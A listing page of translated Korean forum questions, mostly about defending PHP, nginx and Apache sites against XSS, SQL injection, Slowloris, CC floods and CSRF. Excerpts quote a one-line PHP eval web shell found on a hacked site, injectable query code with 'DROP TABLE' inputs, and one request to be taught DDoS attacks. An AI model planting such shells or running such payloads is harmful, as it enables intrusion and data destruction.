laravel이 {!!content!!}를 사용할 때 XSS 공격을 방지하는 방법은 무엇입니까?

일반적으로 {{$article->title}}을 사용하는데 가끔 형식이 있기 때문에 {!!$article->body!!}가 필요하지만 이는 xss 공격으로 이어질 수 있으니 어떻게 해야 할까요? xss 공격을 방지하기 위해 처리합니까?

習慣沉默 2017-05-16 16:48:38 0  1  711

centos - nginx는 Slowloris 공격을 어떻게 방어합니까?

nginx는 모든 HTTP 서버를 대상으로 연결을 설정하고 매우 낮은 속도로 패킷을 전송하고 연결을 열어두는 Slowloris 공격으로 감지되었습니다. 클라이언트가 이러한 연결을 계속 설정하면 서버에서 사용 가능한 연결 풀이 빠르게 채워져 서비스 거부 공격이 발생합니다. ...

漂亮男人 2017-04-25 09:03:29 0  1  1053

XSS 공격 방지 관련, 사용자 입력시 HTML 인코딩? 페이지 출력시 HTML 인코딩이 되나요? 어떤 솔루션이 더 좋나요?

질문: XSS 공격 방지와 관련하여 사용자가 입력할 때 HTML 인코딩을 수행해야 합니까? 페이지 출력시 HTML 인코딩이 되나요? 어떤 솔루션이 더 좋나요? 개인적으로는 출력 내용이 포함된 페이지가 많아지고, 매번 인코딩할 때 놓치기 쉬우므로 입력할 때 인코딩하는 것이 더 편리할 것 같지만, 실제 응용에서는 출력이...

天蓬老师 2017-05-16 12:03:00 0  3  856

PHP에서 SQL 주입 공격을 방지하는 방법은 무엇입니까?

사용자 입력이 수정 없이 SQL 쿼리에 삽입되면 다음 예와 같이 애플리케이션이 SQL 주입 공격에 취약해집니다. $unsafe_variable=$_POST['user_input'];mysql_query("INSERTINTO`table `(`column`) VALUES('$unsafe_variable')");이는 사용자가 value');DROPTABLEta와 같은 것을 입력할 수 있기 때문입니다.

P粉939473759 2023-08-22 10:23:01 0  2  577

구현 방법, doos 공격.

Doos 공격 방법을 가르쳐 줄 수 있는 사람이 있나요? QQ3025895344

phpcn_u132916 2018-03-17 21:17:31 0  4  1773

아파치 서버가 공격당했습니다

안녕하세요 여러분, 저는 PHP 초보자이며 기본적으로 서버 보안에 대한 지식이 전혀 없습니다. 현재 온라인 웹사이트를 운영하고 있습니다. 하지만 매일, 뚜렷한 이유 없이 아파치가 중단됩니다. Apache의 error.log를 확인한 후 서비스가 중단되기 전에 많은 사람들이 서버에 이러한 의미 없는 요청을 시작했다는 사실을 발견했습니다. 그 이유는 무엇입니까? 예방하는 방법

人不三俗枉少年 2019-05-01 12:39:20 0  1  1164

nginx - 서로 다른 IP에서 PHP에 대한 수천만 건의 요청, 이것이 CC 공격입니까? 그것을 예방하는 방법은 무엇입니까?

언급한 대로 정적 파일은 정상적으로 접근이 가능하지만, PHP가 응답하지 않습니다. nginx 로그를 보면 현재 5개의 로드 밸런서가 이를 처리하고 있습니다. 일이며 IP 주소가 다릅니다. 당분간은 nginx 구성에서 요청된 URL을 수동으로 차단할 수 밖에 없지만 공격은...

世界只因有你 2017-05-16 17:16:21 0  2  536

mongodb 데이터베이스가 공격을 받아 데이터베이스가 삭제되었습니다. 데이터를 복구하는 방법은 무엇입니까?

mongodb 데이터베이스가 공격을 받아 데이터베이스가 삭제되었습니다. 데이터를 복원하는 방법은 무엇입니까?

某草草 2017-05-02 09:24:40 0  1  921

nginx - 사용자 에이전트를 사용하여 공격하는 방법에 대한 질문

오늘 회사 서버 nginx의 access.log에 아주 이상한 로그가 있다는 것을 우연히 발견했습니다. {code...} 가장 이상한 부분은 제가 검색한 스크립트인 http1.0 user-agent가 사용된다는 것입니다. 온라인에서 사용자 에이전트를 사용하여 공격하는 방법에 대한 정보를 찾지 못했다는 사실을 발견했습니다.

世界只因有你 2017-05-16 17:10:16 0  3  686

웹사이트가 CC 공격을 받고 있습니다. Apache가 시작된 후 3초 이내에 죽고 메모리가 오버플로됩니다.

웹사이트가 CC 공격을 받고 있습니다. Apache가 시작된 후 3초 이내에 죽고 메모리가 오버플로됩니다.

Time 2018-10-05 21:18:17 0  3  1343

Java 프로그램에서 SQL 주입 공격 방지

데이터베이스 테이블을 업데이트하려면 Java 프로그램에 다음 명령문을 추가해야 합니다. Stringinsert="INSERTINTOcustomer(name,address,email)VALUES('"+name+"','"+addre+"','"+email+"') ; ";이것은 SQL 주입을 통해 악용될 수 있다고 들었습니다. 예: DROPTABLEcustomer

P粉328911308 2023-10-20 20:06:17 0  2  851

헤더에서 nginx 버전 번호와 PHP 버전 번호를 숨기는 방법은 무엇입니까?

예를 들어 헤더에서 nginx 버전 번호와 PHP 버전 번호를 숨기는 방법은 무엇입니까? 특정 악성 검색 공격을 방지합니다.

伊谢尔伦 2017-05-16 17:25:55 0  2  766

android - 컨트롤에 네트워크 로딩 데이터가 채워지면 컨트롤의 크기는 기본 크기이며, 클릭해야만 내가 설정한 크기로 변경됩니다.

네트워크 데이터를 로드한 후 핸들러를 사용하여 데이터를 기본 스레드에 전달한 다음 컨트롤을 채웁니다. 그런데 처음 데이터를 로드할 때 데이터를 로드하는 컨트롤의 크기가 제가 설정한 것이 아닌데, 한 번 클릭해야만 컨트롤이 내가 설정한 크기가 되는 것 같습니다. 클릭 전 클릭 후

某草草 2017-05-16 13:31:14 0  1  715

이 소스 코드에 트로이 목마가 있나요?

방화벽 프롬프트: mysql 데이터베이스가 심하게 크랙되었습니다. 공격자의 ip*****(로컬 주소)... 소스 코드에 트로이 목마가 있습니까? 트로이 목마를 탐지하는 방법은 무엇입니까?

旎旎 2018-08-16 20:04:56 0  1  1265

angle.js - 첫 번째 li에 기본적으로 스타일이 있고 현재 클릭한 li에는 스타일이 있고 다른 li에는 스타일이 없도록 ng-repeat 중첩 루프에서 ul li를 표시하는 방법은 무엇입니까?

질문: ng-repeat를 사용하여 데이터를 반복합니다. 어떻게 해야 합니까? 1. 페이지가 열리면 기본적으로 첫 번째 li가 스타일로 표시됩니까? 2. 현재 클릭한 li에는 스타일이 있고 다른 li에는 스타일이 없습니까? 다음은 HTML 코드 다이어그램입니다: <ul ng-repeat="u in pinpaiData" class=...

我想大声告诉你 2017-05-15 17:08:27 0  1  1507

php - 타사 qq 로그인에 대한 CSRF

타사 로그인을 할 때 CSRF 공격을 방지하고 싶었는데, 그런 다음 콜백 함수에 $_GET['state'] 가 가능하다는 것을 알 수 있었습니다. 읽어오는데 $state가 NULL인데 저장이 안된건지 궁금하네요...

滿天的星座 2017-05-27 17:43:43 0  2  701

다시 작성된 제목은 다음과 같습니다. 반환 값을 얻기 위해 jQuery 및 POST 메서드와 결합된 PHP 버튼 사용

사용자 이름을 가져오는 간단한 양식이 있으며 다음을 달성하고 싶습니다. 사용자가 버튼을 클릭하면 여러 번의 클릭을 방지하기 위해 버튼이 비활성화됩니다(실제 경우 모든 데이터를 처리하는 데 몇 초가 걸릴 수 있습니다. API 호출, 데이터베이스에 쓰기 등), 클릭한 후 PHP에서 $_POST['username']을 캡처하고 요청을 추가로 처리하려면 새 POST 요청이 발생해야 합니다. 이 목표를 달성하는 방법은 무엇입니까? 코드는 다음과 같은데 예상대로 작동하지 않습니다. <?phpsession_start() // 양식이 제출되...

P粉738821035 2023-09-05 08:42:27 0  2  592

웹사이트 프로그램이 Trojan [<?php eval($_POST[1]);?> ok]에 의해 침입되었습니다. 메커니즘을 찾는 데 도움을 주세요.

최근 해당 웹사이트가 해커들의 공격을 자주 받고 있는데, 저희는 빠른 시일 내에 허점을 찾아 고민을 해결할 수 있도록 저희의 생각을 명확히 하기 위해 PHP 전문가들의 도움을 요청하고 있습니다! 1. 해당 웹사이트는 기본 버전인 PHPCMS_V9_5.20을 사용하여 구축되었습니다. 2. 모든 파일은 처음에 완전히 개방된 권한으로 서버 루트 디렉터리에 저장됩니다. ...

伊谢尔伦 2017-06-26 10:48:58 0  5  2535